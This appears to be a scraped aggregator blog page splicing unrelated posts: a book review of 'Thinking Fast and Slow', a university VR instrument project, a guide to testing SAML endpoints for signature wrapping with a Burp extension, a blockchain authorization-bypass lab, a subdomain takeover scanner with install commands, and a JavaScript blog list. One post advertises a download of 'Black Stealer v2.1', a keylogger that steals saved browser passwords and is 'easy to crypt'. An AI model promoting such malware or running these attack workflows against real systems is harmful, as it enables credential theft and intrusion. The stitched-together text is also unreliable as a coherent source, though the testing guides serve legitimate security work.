A New Internet Library: Add Your Website/Blog or Suggest A Website/Blog to our Free Web Directory http://anil.myfunda.net.

Its very simple, free and SEO Friendly.
Submit Now....

Friday, May 1, 2020

Thinking Fast And Slow: Book Review (Monday Musings 84)

I heard about this book from one of my streamer friends after I mentioned how I don't think of myself as good at responding to unexpected things. I rarely think on my feet as well as I'd like. She'd heard about Thinking Fast and Slow by Daniel Kahneman and felt it might explain why some people can't respond quickly to surprises. Further, those types of people are more thoughtful, so I might not feel too bad about myself.

However, the book goes into different matters than what I hoped. Kahneman's thesis is that humans are not rational and how that was a huge breakthrough in the world of economics. This surprised me, because we all know that people do really stupid things, even the most rational among us...for example, we all know usually sensible people who don't wear helmets or seatbelts nor take other easy to implement safety precautionss.

Even so, the predominant tendency in economics for most of its existence as a science is to hold that people are rational and will do rational things. Kahneman proposes otherwise. He describes two systems that we use: System 1 is the immediate reaction we have to stimulus, our gut instinct. If we see an animal, we know right away that it's a dog, we don't have to think about it. Or, if we see smoke, we're know to try to put the fire out...or to flee.

While System 2 is your conscious mind, where you think things through. For instance, making a decision to buy one product rather than another. In a series of experiments, Kahneman shows that System 2 isn't always rational and thoughtful, but can be rather lazy. This can be very true, because we have to deal with a lot of issues in life, so that we can't spend that much energy carefully thinking through every decision and thought process. That would be too exhausting.

One experiment proving his thesis is the following problem: A ball and a bat costs $1.10, and the bat costs $1.00, how much does the ball cost?

I would immediately say "definitely not 10 cents" but only because I'm aware of these psychological experiments where the answer is often not what you think at first.

Even so, if I were a participant in this study, I would've answered, "Definitely not 10 cents, but I'm too tired to figure out the true cost of the ball". Most people answer 10 cents, because that's your impulse from System 1, and System 2 is too lazy to override the impulse.

As you can see from this example, your system 1 comes up immediately 10 cents, but your system 2 doesn't override this answer. The correct answer is 5 cents.

Kahneman also describes how system 2 is very biased - in one of many experiments he conducted, he showed how sentences in big bold letters are believed to be true more so than the same sentences in small lettering.

I found the first few chapters very interesting, and the experiments thought provoking. However, midway through the book, I couldn't get past the rest of the book because Kahneman gives so many thought experiments, it becomes tiring.

Indeed, the book appeared to be a monograph, where he would make a statement and then show examples to prove his theory. By answering all of the questions that he asks, I got fatigued.

As a result, I skipped the rest of the book to the conclusion. Because humans don't do things that are good for us, policies should allow for freedom of choice, but steer people toward the right thing to do.

For instance, employees are automatically opted in an IRA retirement savings plan at 10% of their salary. However, you can easily opt out of this plan if you want to.

Therefore, you have a choice to opt in or opt out. But with this policy, people may be too "lazy" to opt out, and unbeknownst to them, 10% goes into retirement fund. 10 years later, they will be surprised that it increased to a really nice sum.

Kahneman didn't mention this in his conclusion, but the conclusion I got from the book is to be open minded. We may think something is absolutely true, come to find out, we didn't realize that we were wrong all along, and never questioned it. By being open minded and nonjudgmental, your life will be more enriching. 

For instance, someone whom you had negative first impressions (System 1 making snap judgments), keep an open mind about that person, and you may find the person becoming your friend. Of course, if that person does awful things one after the other, then your first impressions were correct and System 2 will note to avoid that person. But this will be due to empirical evidence as opposed to a snap judgment.

It's easy to say people do dumb things all the time, but how do you explain why that's the case, and how do you prove it in a systematic way? In Thinking Fast and Slow, Kahneman does a superb job answering those questions, albeit in an eventually exhausting to read manner.

The How of Happiness Review

UCLan Games Design Projects With GSM Research Group


Latest News from Paresh Parmar: Head of International Development & Partnerships for School of Art, Design & Fashion at University of Central Lancashire.

















'We are grateful that 2019 gave us (GSM - Global Sound Movement) the opportunity to present our working concepts on cultural preservation at the '2019 British Science Festive Press Conference'. Happy to share that it caught the eye of some top press. The Virtual Reality Hani Drum was sighted as innovation in cultural preservation. Thanks to Josh Taylor, Josh Write & Bev Bush 'BA (Hons) Games Design' at UCLan. You really helped us push the boundaries. Josh Wright and Josh Taylor from UCLan Games Design developed the VR Hani Drum. Now people can actually play this ancient drum, without damaging it, our travelling to the distant mountains of the Yunnan, China. Watch the clip, more coming soon...'










GSM on BBC North West Tonight - 18 Sept 2019.
The pioneering work in virtual reality (VR) from UCLan's Global Sound Movement (GSM), which is allowing rare musical instruments from around the world to be digitally preserved, was showcased at the British Science Festival. GSM's innovative work with VR allows user interactivity with instruments from hard to reach geographical locations. Participants play music whilst receiving haptic feedback and triggering the actual sound of the musical instrument. The technology also allows for remote tutoring from someone in a different location, but within the same VR environment. Paresh Parmar, Co-founder of Global Sound Movement and Senior Lecturer at UCLan, said: "GSM is dedicated to preserving musical instruments of cultural significance and combining innovative new technologies making them globally accessible. This enables musicians and non-musicians to access these wonderful instruments and sounds, whilst providing resources for the original communities GSM worked with." A core belief of GSM is to preserve and share the sounds of the world. To achieve this, GSM is constantly developing new technologies to expand the reach of their work and enable people, regardless of musical talent, to engage, compose or simply enjoy music. The virtual instruments and corresponding
sound libraries can also be integrated with music production software, enabling composers internationally to use these rare sounds. All proceeds from the technology goes back into the local communities from which the instruments are recorded.
Also see:
https://www.britishscienceassociation.org/blog/preserving-rare-instruments-in-the-virtual-world

Bev Bush from UCLan Games Design worked with GSM to develop the Hani Embroidery App.






This research is part of a collaboration with The Global Sound Movement. Audiences can interact in a unique way with GSM sampled sounds from the drums of the Hani Tribe in China to create an embroidery pattern which celebrates their rhythms and traditional costume designs.
"Can gamification be used as an interactive and transformative tool for artistic expression to engage learning, encourage appreciation and to illustrate traditional, historical and cultural related experience?"
Advertising designer Elliot Harris' animated film of 2002, 'Burberry-Rain' identifies the 4 – dimensional properties of Burberry fabric. In 2013 Sophia George developed a game based on 'The Strawberry Thief' which re-vitalized the art of William Morris. The Hani App moves beyond re-vitalization of a design to involve interaction with sound and illustration of traditional crafts, exploring the use of digital tools to create unique artefacts. This acknowledges and records ideas and objects which may otherwise be lost or forgotten.
'The Art of Computer Game Design.'(Crawford, C. 1997)
'Play, Games and Gamification in Contemporary Art Museums.'(Romualdo, S. 2013)
'Gamification in the Arts.' (Bouchard, A. 2014)
An exploratory, prototyping methodology was used in this project, allowing for a flexible development style. Sprite Designs were created in Adobe Photoshop and implemented into the App using Scirra's Construct game engine. The work was inspired by GSM's photos and sampled sounds and is available to the public as an interactive App on the GSM website, also in the GSM South China Exhibitions and as a video on Vimeo with images of artefacts that can be purchased from the shop at this link.




Sunday, April 26, 2020

Testing SAML Endpoints For XML Signature Wrapping Vulnerabilities

A lot can go wrong when validating SAML messages. When auditing SAML endpoints, it's important to look out for vulnerabilities in the signature validation logic. XML Signature Wrapping (XSW) against SAML is an attack where manipulated SAML message is submitted in an attempt to make the endpoint validate the signed parts of the message -- which were correctly validated -- while processing a different attacker-generated part of the message as a way to extract the authentication statements. Because the attacker can arbitrarily forge SAML assertions which are accepted as valid by the vulnerable endpoint, the impact can be severe. [1,2,3]

Testing for XSW vulnerabilities in SAML endpoints can be a tedious process, as the auditor needs to not only know the details of the various XSW techniques, but also must handle a multitude of repetitive copy-and-paste tasks and apply the appropriate encoding onto each message. The latest revision of the XSW-Attacker module in our BurpSuite extension EsPReSSo helps to make this testing process easier, and even comes with a semi-automated mode. Read on to learn more about the new release! 

 SAML XSW-Attacker

After a signed SAML message has been intercepted using the Burp Proxy and shown in EsPReSSO, you can open the XSW-Attacker by navigating to the SAML tab and then the Attacker tab.  Select Signature Wrapping from the drop down menu, as shown in the screenshot below:



To simplify its use, the XSW-Attacker performs the attack in a two step process of initialization and execution, as reflected by its two tabs Init Attack and Execute Attack. The interface of the XSW-Attacker is depicted below.
XSW-Attacker overview

The Init Attack tab displays the current SAML message. To execute a signature wrapping attack, a payload needs to be configured in a way that values of the originally signed message are replaced with values of the attacker's choice. To do this, enter the value of a text-node you wish to replace in the Current value text-field. Insert the replacement value in the text-field labeled New value and click the Add button. Multiple values can be provided; however, all of which must be child nodes of the signed element. Valid substitution pairs and the corresponding XPath selectors are displayed in the Modifications Table. To delete an entry from the table, select the entry and press `Del`, or use the right-click menu.

Next, click the Generate vectors button - this will prepare the payloads accordingly and brings the Execute Attack tab to the front of the screen.

At the top of the Execute Attack tab, select one of the pre-generated payloads. The structure of the selected vector is explained in a shorthand syntax in the text area below the selector.
The text-area labeled Attack vector is editable and can be used to manually fine-tune the chosen payload if necessary. The button Pretty print opens up a syntax-highlighted overview of the current vector.
To submit the manipulated SAML response, use Burp's Forward button (or Go, while in the Repeater).

Automating XSW-Attacker with Burp Intruder

Burp's Intruder tool allows the sending of automated requests with varying payloads to a test target and analyzes the responses. EsPReSSO now includes a Payload Generator called XSW Payloads to facilitate when testing the XML processing endpoints for XSW vulnerabilities. The following paragraphs explain how to use the automated XSW attacker with a SAML response.

First, open an intercepted request in Burp's Intruder (e.g., by pressing `Ctrl+i`). For the attack type, select Sniper. Open the Intruder's Positions tab, clear all payload positions but the value of the XML message (the `SAMLResponse` parameter, in our example). Note: the XSW-Attacker can only handle XML messages that contain exactly one XML Signature.
Next, switch to the Payloads tab and for the Payload Type, select Extension-generated. From the newly added Select generator drop-down menu, choose XSW Payloads, as depicted in the screenshot below.



While still in the Payloads tab, disable the URL-encoding checkbox in the Payload Encoding section, since Burp Intruder deals with the encoding automatically and should suffice for most cases.
Click the Start Attack button and a new window will pop up. This window is shown below and is similar to the XSW Attacker's Init Attack tab.


Configure the payload as explained in the section above. In addition, a schema analyzer can be selected and checkboxes at the bottom of the window allow the tester to choose a specific encoding. However, for most cases the detected presets should be correct.

Click the Start Attack button and the Intruder will start sending each of the pre-generated vectors to the configured endpoint. Note that this may result in a huge number of outgoing requests. To make it easier to recognize the successful Signature Wrapping attacks, it is recommended to use the Intruder's Grep-Match functionality. As an example, consider adding the replacement values from the Modifications Table as a Grep-Match rule in the Intruder's Options tab. By doing so, a successful attack vector will be marked with a checkmark in the results table, if the response includes any of the configure grep rules.

Credits

EsPReSSO's XSW Attacker is based on the WS-Attacker [4] library by Christian Mainka and the original adoption for EsPReSSO has been implemented by Tim Günther.
Our students Nurullah Erinola, Nils Engelberts and David Herring did a great job improving the execution of XSW and implementing a much better UI.

---

[1] On Breaking SAML - Be Whoever You Want to Be
[2] Your Software at My Service
[3] Se­cu­ri­ty Ana­ly­sis of XAdES Va­li­da­ti­on in the CEF Di­gi­tal Si­gna­tu­re Ser­vices (DSS)
[4] WS-Attacker

Related links


Saturday, April 25, 2020

DOWNLOAD BLACK STEALER V2.1 FULL

BLACK STEALER V2.1 FULL

Black Stealer v2.1 is an advanced keylogger that can steal even saved passwords from the browsers and sends through Email and FTP. It's really easy to the crypt. Keylogger is a computer program that is a type of surveillance technology used to monitor and record each keystroke typed on a specific computer's keyboard by the user, especially in order to gain unauthorized access to the passwords and other confidential information. It's also called a keystroke logger or system monitor. Download black stealer v2.1 full.

DOWNLOAD BLACK STEALER V2.1 FULL

Related word

Blockchain Exploitation Labs - Part 2 Hacking Blockchain Authorization


Bypassing Blockchain Authorization via Unsecured Functions


Note: Since the first part of this series I have also uploaded some further videos on remediation of reentrancy and dealing with compiler versions when working with this hacking blockchain series.  Head to the console cowboys YouTube account to check those out.  Haha as mentioned before I always forget to post blogs when I get excited making videos and just move on to my next project… So make sure to subscribe to the YouTube if you are waiting for any continuation of a video series.. It may show up there way before here. 

Note 2:  You WILL run into issues when dealing with Ethereum hacking, and you will have to google them as versions and functionality changes often... Be cognizant of versions used hopefully you will not run into to many hard to fix issues. 

In the second part of this lab series we are going to take a look at privacy issues on the blockchain which can result in a vulnerably a traditional system may  not face. Since typically blockchain projects are open source and also sometimes viewable within blockchain explorers but traditional application business logic is not usually available to us. With traditional applications we might not find these issues due to lack of knowledge of internal functionality or inability to read private values on a remote server side script.  After we review some issues we are going to exploit an authorization issues by writing web3.js code to directly bypass vertical authorization restrictions.

Blockchain projects are usually open source projects which allow you to browse their code and see what's going on under the hood.  This is fantastic for a lot of reasons but a developer can run into trouble with this if bad business logic decisions are deployed to the immutable blockchain.  In the first part of this series I mentioned that all uploaded code on the blockchain is immutable. Meaning that if you find a vulnerability it cannot be patched. So let's think about things that can go wrong..

A few things that can go wrong:
  • Randomization functions that use values we can predict if we know the algorithm
  • Hard-coded values such as passwords and private variables you can't change.
  • Publicly called functions which offer hidden functionality
  • Race conditions based on how requirements are calculated

Since this will be rather technical, require some setup and a lot of moving parts we will follow this blog via the video series below posting videos for relevant sections with a brief description of each.  I posted these a little bit ago but have not gotten a chance to post the blog associated with it.  Also note this series is turning into a full lab based blockchain exploitation course so keep a lookout for that.

In this first video you will see how data about your project is readily available on the blockchain in multiple formats for example:
  • ABI data that allows you to interact with methods.
  • Actual application code.
  • Byte code and assembly code.
  • Contract addresses and other data.

 Lab Video Part 1: Blockchain OSINT: 



Once you have the data you need to interact with a contract on the blockchain via some OSINT how do you actually interface with it? That's the question we are going to answer in this second video. We will take the ABI contract array and use it to interact with methods on the blockchain via Web3.js and then show how this correlates to its usage in an HTML file

Lab Video Part 2: Connecting to a Smart Contract: 




Time to Exploit an Application:

Exploit lab time, I created an vulnerable application you can use to follow along in the next video. Lab files can be downloaded from the same location as the last blog located below. Grab the AuthorizationLab.zip file:

Lab file downloads:



Ok so you can see what's running on the blockchain, you can connect to it, now what?   Now we need to find a vulnerability and show how to exploit it. Since we are talking about privacy in this blog and using it to bypass issues. Lets take a look at a simple authorization bypass we can exploit by viewing an authorization coding error and taking advantage of it to bypass restrictions set in the Smart Contract.  You will also learn how to setup a local blockchain for testing purposes and you can download a hackable application to follow along with the exercises in the video..

Lab Video Part 3:  Finding and hacking a Smart Contract Authorization Issue: 





Summary:

In this part of the series you learned a lot, you learned how to transfer your OSINT skills to the blockchain. Leverage the information found to connect to that Smart Contract. You also learned how to interact with methods and search for issues that you can exploit. Finally you used your browsers developer console as a means to attack the blockchain application for privilege escalation.
More articles

  1. Sean Ellis Hacking Growth
  2. Hacking Ethical
  3. Etica Hacker
  4. Definicion De Cracker
  5. Hacking Online Games
  6. Diferencia Entre Hacker Y Cracker
  7. Growth Hacking Instagram
  8. Cracker Definicion
  9. Hacking Wifi Windows
  10. Hacking Prank
  11. Mindset Hacking Español

Takeover - SubDomain TakeOver Vulnerability Scanner


Sub-domain takeover vulnerability occur when a sub-domain (subdomain.example.com) is pointing to a service (e.g: GitHub, AWS/S3,..) that has been removed or deleted. This allows an attacker to set up a page on the service that was being used and point their page to that sub-domain. For example, if subdomain.example.com was pointing to a GitHub page and the user decided to delete their GitHub page, an attacker can now create a GitHub page, add a CNAME file containing subdomain.example.com, and claim subdomain.example.com. For more information: here



Installation:
# git clone https://github.com/m4ll0k/takeover.git
# cd takeover
# python takeover.py
or:
wget -q https://raw.githubusercontent.com/m4ll0k/takeover/master/takeover.py && python takeover.py


Related word

Thursday, April 23, 2020

Top10 Java Script Blogs To Improve Coding Skills

10 Top JavaScript Blogs to Improve Coding Skills
 

The Best JavaScript Blogs

With two decades of improvement, JavaScript has become one of the most popular programming languages of all time. The journey started in 1995 when Brendan Eich created JavaScript in just 10 days. From there, it has seen multiple revisions, drafts, and growth in the form of frameworks, API's, modules, etc. Today, we will go forward and list the top JavaScript blogs from the internet so that you can enjoy the lastest development in the field of JavaScript.

According to RedMonk programming language rankings and GitHut.info, JavaScript is leading the pack in the terms of repositories and the most discussed programming language on StackOverFlow. The numbers itself speaks about the future of JavaScript as it has grown beyond the initial capabilities of simple DOM manipulations.

Learning JavaScript, on the other hand, can be a tricky proposition. New libraries, features, API's or Style Guide, pop up almost every day. The speed of iteration is beyond imagination, and that is why reading leading JavaScript blogs are the best approach to keep up with new changes.

Slack-clone-angularjs

JavaScript is blessed with experts that regularly contribute to the community using live streams, videos, blogs, podcasts, conferences and open source projects. An example of a cool experienced Javascript programmer is evilsoft who broadcasts awesome Javascript projects weekly on LiveEdu..

Some blogs are just gold even when they are not updated frequently. To help you reach the best content on JavaScript, let's list the best JavaScript blogs on the internet. The following blogs have a huge fan following and contain epic JavaScript content.

10 Top JavaScript Blogs to Improve Coding Skills

1. David Walsh Blog

David Walsh is a renowned name in the JavaScript world. He started his career with DZone, but his first real break came while working for SitePen as a Software Engineer. His blog composes of topics related to JavaScript, personal thoughts, guides and much more. The blog design is captivating and is going to hook you up on the first visit. Currently, he is working as a Senior Web Developer at Mozilla.

top javascript blogs

2. DailyJS

DailyJS is one of the best JavaScript blogs on the internet. The blog was started by Alex R. Young, an entrepreneur and Node.js expert in 2009. However, there are recent changes that don't sound great. Currently, the blog is no longer updated, but that does not make the content useless at all. The blog covers diverse content on JavaScript including frameworks, API's, libraries, etc.

2-daily-js

3. SitePoint

SitePoint is one of the leading web development portals since 2000. The main attraction of SitePoint is the collection of highly detailed articles. They are aimed at teaching something new to the readers. JavaScript, on the other hand, is one of the leading topics on the website where experts around the world contribute regularly. The rate of the new blog post is high, and you won't find a blog post that doesn't teach you something new. Truly, a great learning place for any JavaScript developer.

3-Sitepoint

4. JavaScript.com

Not technically a blog, but if you love JavaScript, then you need to follow the website's offerings. JavaScript.com news section is an aggregator for excellent JavaScript news, tutorials, guides, and much more. All you need to do is move to their news section and discover tons of new content surrounding JavaScript. The domain is owned by CodeSchool and is mainly utilized to contribute to the community and a landing page to their courses.

4-JavaScript

5. Brendan Eich

What's the best place to find JavaScript knowledge? The inventor? Well, you are right. Brendan Eich, the creator of JavaScript, keeps his blog with filled with his musings and other excellent thought processes about JavaScript. You can also find videos on the blog. Virtually, the blog is the mind of JavaScript where you understand it in an entirely different manner.

5-brendan-eich

6. JavaScript Playground

JavaScript Playground is yet another great place to get started with all the different JavaScript frameworks, API, and libraries. The focus is to work with the JavaScript ecosystem and provide high quality blog articles, screencast, and podcast for the audience. They also blog about different JavaScript guidelines, tips, and tricks.

6-JavaScript-Playground

7. Superhero.js

If you are looking for a superhero to fetch you the best resources on JavaScript, then you have finally found one. Superhero.js is a simple website that aims to collect everything related to JavaScript including videos, articles, presentations, etc. The content is divided into meaningful sections such as "Understanding JavaScript", "Organize Your Code", etc. Also, the page is regularly updated with new information.

7-superhero

8. JavaScript Jabber

Another "not a blog entry" into the list — JavaScript Jabber is a weekly podcast on JavaScript. Each podcast is around 1 hour of jabber and will sure have something for you to learn. They keep their tab on everything related to JavaScript, including core concepts to popular Framework discussions.

8-JavaScript-Jabber

9. Medium JavaScript Collection

Is medium a blog? Technically, not, but it contains high quality JavaScript articles. Medium is a way to connect to the audience so be ready to read many opinions on how JavaScript should have been, and what's wrong with JavaScript. Other than the ramblings, it hosts amazing JavaScript content such as Speed Up Web Apps.

9-JavaScript-collection-medium

10. Smashing Magazine

Smashing Magazine is one of the oldest websites covering web designing and development. They have a dedicated section for JavaScript, which is constantly updated with tutorials of high caliber. The tutorials surround other web development ideas such as UX, Productivity, etc.

10-smashing-magazine

Conclusion

Here are the ten best JavaScript blogs to improve your coding skills. The blogs and mix of other content types will help you to keep up with new changes in JavaScript field, and improve yourself accordingly.

If you are new to JavaScript and want to get started as soon as possible, check out the JavaScript learn section on LiveEdu.tv. And, yes, it is the most popular programming language on LiveEdu.tv which can benefit from your attention! Also, don't forget to leave a comment on how the JavaScript category page can be improved. We are listening!

Dr. Michael J. Garbade

About Author Dr. Michael Jurgen Garbade is the founder of LiveEdu.TV, Kyuda, Education Ecosystem. He is future Venture Capitalist, Future Politician and always on the lookout for the Next Big Challenge. Obtained Masters in business administration and physics, and a Ph.D. in finance with professional work experience in high-paced environments at Fortune 500 companies like Amazon and General Electric. Expertize: Python, PHP, Sencha Touch & C++, SEO, Finance, Strategy & E-commerce. He speaks English and German and has worked in the US, Europe, and Asia. At Education Ecosystem he is the CEO and runs business operations.

More information

Dotnet-Interviews